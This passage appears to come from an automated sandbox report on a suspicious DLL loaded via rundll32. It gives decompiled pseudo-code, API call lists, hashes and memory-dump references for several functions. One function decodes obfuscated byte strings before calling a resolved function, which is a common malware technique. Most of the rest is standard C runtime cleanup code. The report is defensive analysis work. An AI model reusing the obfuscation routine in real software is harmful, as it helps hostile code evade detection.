				void* _t108;
				void* _t112;
				int _t113;
				char _t142;
				signed int _t143;
				void* _t145;
				signed int _t153;
				void* _t154;
				char _t156;
				intOrPtr _t166;
				char _t167;
				signed int _t168;
				signed int _t169;
				void* _t170;
				CHAR* _t171;
				char _t172;
				void* _t173;

				_v8 = 0x47;
				_t142 = 0;
				_v7 = 0x55;
				_t166 = __edx;
				_v6 = 0;
				_v16 = __edx;
				_v20 = __ecx;
				_t169 = 0x7f;
				if(_v6 != 0) {
					L4:
					_t100 = E6E77111C();
					_v40 = 0x14;
					_v39 = 0x75;
					_v38 = 0x26;
					_v37 = 0x14;
					_t26 = _t100 + 0x24; // 0x24
					_t145 = _t26;
					_v36 = 0x75;
					_v35 = 0x26;
					_v34 = 0x47;
					_v33 = 0x6b;
					_v32 = _t142;
					if(_v32 != _t142) {
						L8:
						_t103 = E6E77657F(_t145,  &_v40);
						_t170 =  *_t103(_v20 + _t166,  &_v8);
						if(_t170 == 0) {
							return 0;
						}
						_v12 = 0x6c;
						_v11 = 0x33;
						_v10 = 0xa;
						_v9 = _t142;
						if(_v9 != _t142) {
							L13:
							_t72 =  &_v12; // 0x6c
							_t73 = E6E77111C() + 0x24; // 0x24
							_t108 = E6E7747AE(_t73, _t166, _t170, _t72);
							_v28 = 0xe;
							_t171 = _t170 + _t108;
							_v27 = 0x5e;
							_v26 = 0x2c;
							_v25 = 0x59;
							_v24 = 0x59;
							_v23 = _t142;
							if(_v23 != 0) {
								L17:
								_t97 = E6E77111C() + 0x24; // 0x24
								_t112 = E6E774733(_t97, _t166, _t171,  &_v28);
								if(_t112 == 0) {
									_t113 = lstrlenA(_t171);
								} else {
									_t113 = _t112 - _t171;
								}
								_t98 =  &_a4; // 0x6c
								 *( *_t98) = _t113;
								return _t171;
							}
							_t153 = 0x7f;
							do {
								asm("cdq");
								asm("cdq");
								 *(_t173 + _t142 - 0x18) = (_t153 + (( *(_t173 + _t142 - 0x18) & 0x000000ff) - 0x59) * 0x1c % _t153) % _t153;
								_t142 = _t142 + 1;
							} while (_t142 < 5);
							_v23 = 1;
							goto L17;
						}
						_t167 = _t142;
						_t143 = 0x7f;
						do {
							_t59 = _t167 - 8; // 0x6c
							_t154 = 0xa;
							asm("cdq");
							asm("cdq");
							 *((char*)(_t173 + _t167 - 8)) = (_t143 + (_t154 - ( *(_t173 + _t59) & 0x000000ff)) * 0x18 % _t143) % _t143;
							_t167 = _t167 + 1;
						} while (_t167 < 3);
						_v9 = 1;
						_t142 = 0;
						goto L13;
					}
					_t172 = _t142;
					_t168 = 0x7f;
					do {
						asm("cdq");
						asm("cdq");
						 *(_t173 + _t172 - 0x24) = (_t168 + (( *(_t173 + _t172 - 0x24) & 0x000000ff) - 0x6b) * 0x25 % _t168) % _t168;
						_t172 = _t172 + 1;
					} while (_t172 < 8);
					_t166 = _v16;
					_v32 = 1;
					goto L8;
				}
				_t156 = 0;
				do {
					asm("cdq");
					asm("cdq");
					 *(_t173 + _t156 - 4) = (_t169 + (( *(_t173 + _t156 - 4) & 0x000000ff) - 0x55) * 0x29 % _t169) % _t169;
					_t156 = _t156 + 1;
				} while (_t156 < 2);
				_v6 = 1;
				goto L4;
			}
















































                                                      0x6e774ccd
                                                      0x6e774cd1
                                                      0x6e774cd4
                                                      0x6e774cd8
                                                      0x6e774cdd
                                                      0x6e774ce2
                                                      0x6e774ce5
                                                      0x6e774ce8
                                                      0x6e774cec
                                                      0x6e774d14
                                                      0x6e774d14
                                                      0x6e774d19
                                                      0x6e774d1d
                                                      0x6e774d21
                                                      0x6e774d25
                                                      0x6e774d29
                                                      0x6e774d29
                                                      0x6e774d2c
                                                      0x6e774d30
                                                      0x6e774d34
                                                      0x6e774d38
                                                      0x6e774d3f
                                                      0x6e774d45
                                                      0x6e774d73
                                                      0x6e774d77
                                                      0x6e774d88
                                                      0x6e774d8c
                                                      0x00000000
                                                      0x6e774e5b
                                                      0x6e774d92
                                                      0x6e774d96
                                                      0x6e774d9a
                                                      0x6e774da1
                                                      0x6e774da7
                                                      0x6e774dd6
                                                      0x6e774dd6
                                                      0x6e774de0
                                                      0x6e774de3
                                                      0x6e774de8
                                                      0x6e774dec
                                                      0x6e774dee
                                                      0x6e774df2
                                                      0x6e774df6
                                                      0x6e774dfa
                                                      0x6e774e01
                                                      0x6e774e08
                                                      0x6e774e31
                                                      0x6e774e3b
                                                      0x6e774e3e
                                                      0x6e774e45
                                                      0x6e774e4c
                                                      0x6e774e47
                                                      0x6e774e47
                                                      0x6e774e47
                                                      0x6e774e52
                                                      0x6e774e55
                                                      0x00000000
                                                      0x6e774e57
                                                      0x6e774e0c
                                                      0x6e774e0d
                                                      0x6e774e1a
                                                      0x6e774e20
                                                      0x6e774e23
                                                      0x6e774e27
                                                      0x6e774e28
                                                      0x6e774e2d
                                                      0x00000000
                                                      0x6e774e2d
                                                      0x6e774dab
                                                      0x6e774dad
                                                      0x6e774dae
                                                      0x6e774dae
                                                      0x6e774db7
                                                      0x6e774dbd
                                                      0x6e774dc3
                                                      0x6e774dc6
                                                      0x6e774dca
                                                      0x6e774dcb
                                                      0x6e774dd0
                                                      0x6e774dd4
                                                      0x00000000
                                                      0x6e774dd4
                                                      0x6e774d49
                                                      0x6e774d4b
                                                      0x6e774d4c
                                                      0x6e774d59
                                                      0x6e774d5f
                                                      0x6e774d62
                                                      0x6e774d66
                                                      0x6e774d67
                                                      0x6e774d6c
                                                      0x6e774d6f
                                                      0x00000000
                                                      0x6e774d6f
                                                      0x6e774cee
                                                      0x6e774cf0
                                                      0x6e774cfd
                                                      0x6e774d03
                                                      0x6e774d06
                                                      0x6e774d0a
                                                      0x6e774d0b
                                                      0x6e774d10
                                                      0x00000000

                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,0000000E,00000000,l3), ref: 6E774E4C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: &$&$,$G$G$U$Y$Y$^$k$l3$l3$u$u
                                                      • API String ID: 1659193697-3556837063
                                                      • Opcode ID: 45ed37f9671baf484970331c987e951f5902197bde8ee281af0e202698207cc1
                                                      • Instruction ID: 073ce32e661a08be52b6d24b16a6dc91ed3d65170943f538b4484bcd498720da
                                                      • Opcode Fuzzy Hash: 45ed37f9671baf484970331c987e951f5902197bde8ee281af0e202698207cc1
                                                      • Instruction Fuzzy Hash: 905104249082C99DEF12CBFD96557EEFFF44F1A204F1800EDC894A7252E2B58A09D7B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77875F, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E6E77875F(_Unknown_base(*)()* __edi, void* __esi) {
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x6e78c940, 0xfa0);
				_t14 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll");
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x6e78c93c = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x6e78c958 = _t11;
						 *0x6e78c95c = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E6E7791BB(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x6e78c940);
						_t7 =  *0x6e78c93c; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}







                                                      0x6e77875f
                                                      0x6e778760
                                                      0x6e77876b
                                                      0x6e77877c
                                                      0x6e778780
                                                      0x6e778793
                                                      0x6e7787a5
                                                      0x6e7787a7
                                                      0x6e7787af
                                                      0x6e7787ca
                                                      0x6e7787d0
                                                      0x6e7787d7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e7787b5
                                                      0x6e7787b5
                                                      0x6e7787bb
                                                      0x6e7787c0
                                                      0x6e7787c2
                                                      0x6e7787c2
                                                      0x6e778782
                                                      0x6e77878d
                                                      0x6e778791
                                                      0x6e7787d9
                                                      0x6e7787db
                                                      0x6e7787e0
                                                      0x6e7787e6
                                                      0x6e7787ec
                                                      0x6e7787f3
                                                      0x00000000
                                                      0x6e7787f6
                                                      0x6e7787fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e778791

                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6E78C940,00000FA0,?,?,6E77873D), ref: 6E77876B
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,6E77873D), ref: 6E778776
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6E77873D), ref: 6E778787
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS,?,?,6E77873D), ref: 6E778799
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable,?,?,6E77873D), ref: 6E7787A7
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,6E77873D), ref: 6E7787CA
                                                      • DeleteCriticalSection.KERNEL32(6E78C940,00000007,?,?,6E77873D), ref: 6E7787E6
                                                      • CloseHandle.KERNEL32(00000000), ref: 6E7787F6
                                                      Strings
                                                      • kernel32.dll, xrefs: 6E778782
                                                      • WakeAllConditionVariable, xrefs: 6E77879F
                                                      • SleepConditionVariableCS, xrefs: 6E778793
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 6E778771
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: 78f158b174cc03556d2d311d51a9bd3bcfc0e06c8f8a64d65c96301d35fb2b69
                                                      • Instruction ID: ba7573c0fb54c0b6f5ccbbe655fc25d61cd4c78c65ab54f2fb2594986a25854d
                                                      • Opcode Fuzzy Hash: 78f158b174cc03556d2d311d51a9bd3bcfc0e06c8f8a64d65c96301d35fb2b69
                                                      • Instruction Fuzzy Hash: 6C011275501F229BEE105AF5BA59B5B3B6CAB677617210271F917DA210DA20C5008EE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E804C5C, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 6E804CA0
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804F8D
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804F9F
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804FB1
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804FC3
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804FD5
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804FE7
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E804FF9
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E80500B
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E80501D
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E80502F
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E805041
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E805053
                                                        • Part of subcall function 6E804F70: _free.LIBCMT ref: 6E805065
                                                      • _free.LIBCMT ref: 6E804C95
                                                        • Part of subcall function 6E7F99B6: HeapFree.KERNEL32(00000000,00000000), ref: 6E7F99CC
                                                        • Part of subcall function 6E7F99B6: GetLastError.KERNEL32(6E849074,?,6E805750,6E849074,00000000,6E849074,00000000,?,6E805A55,6E849074,00000007,6E849074,?,6E804DF4,6E849074,6E849074), ref: 6E7F99DE
                                                      • _free.LIBCMT ref: 6E804CB7
                                                      • _free.LIBCMT ref: 6E804CCC
                                                      • _free.LIBCMT ref: 6E804CD7
                                                      • _free.LIBCMT ref: 6E804CF9
                                                      • _free.LIBCMT ref: 6E804D0C
                                                      • _free.LIBCMT ref: 6E804D1A
                                                      • _free.LIBCMT ref: 6E804D25
                                                      • _free.LIBCMT ref: 6E804D5D
                                                      • _free.LIBCMT ref: 6E804D64
                                                      • _free.LIBCMT ref: 6E804D81
                                                      • _free.LIBCMT ref: 6E804D99
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: d3ff3a11b5e8504cd6b2ab8e3eea6c7d1048effe4c2fa267fd241b32356b3968
                                                      • Instruction ID: a6536875907f8165ebcdc62dfc4844a09b1c0b2b0eb05962dcc45828d75dd1d2
                                                      • Opcode Fuzzy Hash: d3ff3a11b5e8504cd6b2ab8e3eea6c7d1048effe4c2fa267fd241b32356b3968
                                                      • Instruction Fuzzy Hash: B9319C31A44605DFEB61CEF9DD04B9673E8AFA0364F114C19E868C72A4DF35B9428B20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E78138A, Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E6E78138A(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e78c800) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E77D646(_t46);
							E6E7816A7( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E77D646(_t47);
							E6E7817A5( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E77D646( *((intOrPtr*)(_t74 + 0x7c)));
						E6E77D646( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E77D646( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E77D646( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E77D646( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E77D646( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E7814FB( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e78c1d0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E77D646(_t31);
							E6E77D646( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe73
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E77D646(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E77D646(_t74);
			}















                                                      0x6e781392
                                                      0x6e781396
                                                      0x6e78139e
                                                      0x6e7813a7
                                                      0x6e7813ac
                                                      0x6e7813b3
                                                      0x6e7813bb
                                                      0x6e7813c3
                                                      0x6e7813ce
                                                      0x6e7813d4
                                                      0x6e7813d5
                                                      0x6e7813dd
                                                      0x6e7813e5
                                                      0x6e7813f0
                                                      0x6e7813f6
                                                      0x6e7813fa
                                                      0x6e781405
                                                      0x6e78140b
                                                      0x6e7813ac
                                                      0x6e78140c
                                                      0x6e781414
                                                      0x6e781427
                                                      0x6e78143a
                                                      0x6e781448
                                                      0x6e781453
                                                      0x6e781458
                                                      0x6e781461
                                                      0x6e781469
                                                      0x6e78146a
                                                      0x6e781470
                                                      0x6e781473
                                                      0x6e781476
                                                      0x6e78147d
                                                      0x6e78147f
                                                      0x6e781483
                                                      0x6e78148b
                                                      0x6e781492
                                                      0x6e781498
                                                      0x6e781499
                                                      0x6e781499
                                                      0x6e7814a0
                                                      0x6e7814a2
                                                      0x6e7814a2
                                                      0x6e7814a7
                                                      0x6e7814af
                                                      0x6e7814b4
                                                      0x6e7814b5
                                                      0x6e7814b5
                                                      0x6e7814b8
                                                      0x6e7814bb
                                                      0x6e7814be
                                                      0x6e7814c1
                                                      0x6e7814c1
                                                      0x6e7814d1

                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 6E7813CE
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E7816C4
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E7816D6
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E7816E8
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E7816FA
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E78170C
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E78171E
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E781730
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E781742
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E781754
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E781766
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E781778
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E78178A
                                                        • Part of subcall function 6E7816A7: _free.LIBCMT ref: 6E78179C
                                                      • _free.LIBCMT ref: 6E7813C3
                                                        • Part of subcall function 6E77D646: HeapFree.KERNEL32(00000000,00000000), ref: 6E77D65C
                                                        • Part of subcall function 6E77D646: GetLastError.KERNEL32(?,?,6E77CED9), ref: 6E77D66E
                                                      • _free.LIBCMT ref: 6E7813E5
                                                      • _free.LIBCMT ref: 6E7813FA
                                                      • _free.LIBCMT ref: 6E781405
                                                      • _free.LIBCMT ref: 6E781427
                                                      • _free.LIBCMT ref: 6E78143A
                                                      • _free.LIBCMT ref: 6E781448
                                                      • _free.LIBCMT ref: 6E781453
                                                      • _free.LIBCMT ref: 6E78148B
                                                      • _free.LIBCMT ref: 6E781492
                                                      • _free.LIBCMT ref: 6E7814AF
                                                      • _free.LIBCMT ref: 6E7814C7
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 6684b1da2d0f74da8dc873592dc819ee6e46d88803013cd5dbd2d43b1590ea3f
                                                      • Instruction ID: 0b38e87be8de8458d28c4affd44b375ddb52418420c02fe73b80ac353f9ad8b9
                                                      • Opcode Fuzzy Hash: 6684b1da2d0f74da8dc873592dc819ee6e46d88803013cd5dbd2d43b1590ea3f
                                                      • Instruction Fuzzy Hash: 7B316971A082019BEF608EF9DA88B8B73E9AB51394F105839E56DD7174DB30A9498F18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77ED94, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E6E77ED94(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x6e785d58;
				if(_t68 != 0x6e785d58) {
					E6E77D646(_t68);
					_t36 = _a4;
				}
				E6E77D646( *((intOrPtr*)(_t36 + 0x3c)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x30)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x34)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x38)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x28)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x2c)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x40)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x44)));
				E6E77D646( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E77EBC0(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E77EC2B(_t67, _t72, _t73, _t77);
			}














                                                      0x6e77ed94
                                                      0x6e77ed94
                                                      0x6e77ed94
                                                      0x6e77ed99
                                                      0x6e77ed9f
                                                      0x6e77eda1
                                                      0x6e77eda7
                                                      0x6e77edaa
                                                      0x6e77edaf
                                                      0x6e77edb2
                                                      0x6e77edb6
                                                      0x6e77edc1
                                                      0x6e77edcc
                                                      0x6e77edd7
                                                      0x6e77ede2
                                                      0x6e77eded
                                                      0x6e77edf8
                                                      0x6e77ee03
                                                      0x6e77ee11
                                                      0x6e77ee1c
                                                      0x6e77ee24
                                                      0x6e77ee25
                                                      0x6e77ee28
                                                      0x6e77ee2e
                                                      0x6e77ee32
                                                      0x6e77ee36
                                                      0x6e77ee37
                                                      0x6e77ee41
                                                      0x6e77ee47
                                                      0x6e77ee48
                                                      0x6e77ee4b
                                                      0x6e77ee51
                                                      0x6e77ee55
                                                      0x6e77ee59
                                                      0x6e77ee60

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID: X]xn
                                                      • API String ID: 776569668-108395027
                                                      • Opcode ID: 866e60a44d01232f68561c69d5a9303a88977bf9a320d997967fcb37b599b930
                                                      • Instruction ID: 1dc88fe6e81b7a1661847b6207d5ad366828787451c06b2cdc676def36204e3e
                                                      • Opcode Fuzzy Hash: 866e60a44d01232f68561c69d5a9303a88977bf9a320d997967fcb37b599b930
                                                      • Instruction Fuzzy Hash: C02196B6904108AFCF51DFD4CA88DDE7BB9AF49244B0045A6A619DB130EB31EB448F84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F2970, Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?), ref: 6E7F29C8
                                                      • GetLastError.KERNEL32 ref: 6E7F29D5
                                                      • __dosmaperr.LIBCMT ref: 6E7F29DC
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,?), ref: 6E7F2A08
                                                      • GetLastError.KERNEL32 ref: 6E7F2A12
                                                      • __dosmaperr.LIBCMT ref: 6E7F2A19
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 6E7F2A5C
                                                      • GetLastError.KERNEL32 ref: 6E7F2A66
                                                      • __dosmaperr.LIBCMT ref: 6E7F2A6D
                                                      • _free.LIBCMT ref: 6E7F2A79
                                                      • _free.LIBCMT ref: 6E7F2A80
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                      • String ID:
                                                      • API String ID: 2441525078-0
                                                      • Opcode ID: 873afa931e4749c5c7a84312da4ac09cde0b09a81b8650742d975bfef1fcae12
                                                      • Instruction ID: 97392eff61b9168849f3d8f0ed79b981f97ddca9f366913312ce9148a0a4be7e
                                                      • Opcode Fuzzy Hash: 873afa931e4749c5c7a84312da4ac09cde0b09a81b8650742d975bfef1fcae12
                                                      • Instruction Fuzzy Hash: B631A07180428AEFDF11DFE5CD589EE3F7CEF46264B100568F82467264DB328912CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E77A300, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E6E77A300(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
